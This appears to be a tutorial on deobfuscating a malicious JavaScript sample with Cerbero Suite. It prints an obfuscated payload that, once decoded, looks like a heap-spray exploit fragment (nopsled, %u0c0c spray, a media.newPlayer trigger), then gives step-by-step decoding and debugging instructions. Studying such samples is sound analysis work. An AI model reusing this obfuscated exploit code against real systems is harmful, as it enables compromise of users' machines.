QjxT(45) + QjxT(5) + QjxT(55) + QjxT(3) + QjxT(126) + QjxT(99) + QjxT(126) + QjxT(48) + QjxT(49) + QjxT(46) + QjxT(45) + QjxT(50) + QjxT(59) + QjxT(58) + QjxT(126) + QjxT(117) + QjxT(126) + QjxT(46) + QjxT(63) + QjxT(39) + QjxT(50) + QjxT(49) + QjxT(63) + QjxT(58) + QjxT(101) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(35) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(56) + QjxT(43) + QjxT(48) + QjxT(61) + QjxT(42) + QjxT(55) + QjxT(49) + QjxT(48) + QjxT(126) + QjxT(42) + QjxT(44) + QjxT(55) + QjxT(57) + QjxT(57) + QjxT(59) + QjxT(44) + QjxT(1) + QjxT(60) + QjxT(43) + QjxT(57) + QjxT(118) + QjxT(119) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(37) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(43) + QjxT(42) + QjxT(55) + QjxT(50) + QjxT(112) + QjxT(46) + QjxT(44) + QjxT(55) + QjxT(48) + QjxT(42) + QjxT(58) + QjxT(118) + QjxT(124) + QjxT(111) + QjxT(112) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(126) + QjxT(100) + QjxT(126) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(124) + QjxT(114) + QjxT(126) + QjxT(48) + QjxT(59) + QjxT(41) + QjxT(126) + QjxT(26) + QjxT(63) + QjxT(42) + QjxT(59) + QjxT(118) + QjxT(119) + QjxT(119) + QjxT(101) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + 
QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(42) + QjxT(44) + QjxT(39) + QjxT(126) + QjxT(37) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(51) + QjxT(59) + QjxT(58) + QjxT(55) + QjxT(63) + QjxT(112) + QjxT(48) + QjxT(59) + QjxT(41) + QjxT(14) + QjxT(50) + QjxT(63) + QjxT(39) + QjxT(59) + QjxT(44) + QjxT(118) + QjxT(48) + QjxT(43) + QjxT(50) + QjxT(50) + QjxT(119) + QjxT(101) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(35) + QjxT(126) + QjxT(61) + QjxT(63) + QjxT(42) + QjxT(61) + QjxT(54) + QjxT(118) + QjxT(59) + QjxT(119) + QjxT(126) + QjxT(37) + QjxT(35) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(43) + QjxT(42) + QjxT(55) + QjxT(50) + QjxT(112) + QjxT(46) + QjxT(44) + QjxT(55) + QjxT(48) + QjxT(42) + QjxT(58) + QjxT(118) + QjxT(124) + QjxT(111) + QjxT(112) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(126) + QjxT(100) + QjxT(126) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(124) + QjxT(114) + QjxT(126) + QjxT(48) + QjxT(59) + QjxT(41) + QjxT(126) + QjxT(26) + QjxT(63) + QjxT(42) + QjxT(59) + QjxT(118) + QjxT(119) + QjxT(119) + QjxT(101) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(35) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + 
QjxT(126) + QjxT(126) + QjxT(126) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(45) + QjxT(46) + QjxT(44) + QjxT(63) + QjxT(39) + QjxT(1) + QjxT(54) + QjxT(59) + QjxT(63) + QjxT(46) + QjxT(118) + QjxT(119) + QjxT(101) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(42) + QjxT(44) + QjxT(55) + QjxT(57) + QjxT(57) + QjxT(59) + QjxT(44) + QjxT(1) + QjxT(60) + QjxT(43) + QjxT(57) + QjxT(118) + QjxT(119) + QjxT(101) + QjxT(84) + '';

eval(gZJkRLU);

Initially, I will save this encoded JavaScript into a file. I like to use Cerbero Suite Advanced to reverse this because it has a lot of functionality. You can download it from https://cerbero.io/

Ok, let's start. Once the file with the payload has been saved, we can follow the steps below.

When the file has been loaded, it will by default be opened in Hex mode. We need to convert the bytes into text. Press CTRL+R, select Conversion > Bytes to text and press OK.

Then select utf_8 as the Codec.

A new tab called Decoded bytes will open. We need to tell Cerbero that this text is actually JavaScript code.

The next step is to beautify it so that it is easier to understand. Press CTRL+R and select Beautify JavaScript.

The next step is to debug it. We can see that at the very bottom of the code there is an eval call. We can use Cerbero's debug function to see the decoded JavaScript. Press CTRL+R again, select Debug JavaScript and press OK.

Press OK again on the confirmation dialog below.

A new window opens with the code in debugging mode. Just press Run to start debugging.

Yeah … when the code runs, you can see the actual code after the decode process. We can now further analyze the payload because it has become human readable.

That is it. Easy, right? With the correct tools, code deobfuscation runs smoothly. 🙂

Below are the obfuscation techniques that can be layered into a single piece of code.
